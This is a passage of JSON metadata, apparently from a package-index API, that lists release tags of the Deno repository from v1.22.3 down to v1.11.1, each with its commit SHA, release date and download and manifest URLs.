gs/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z"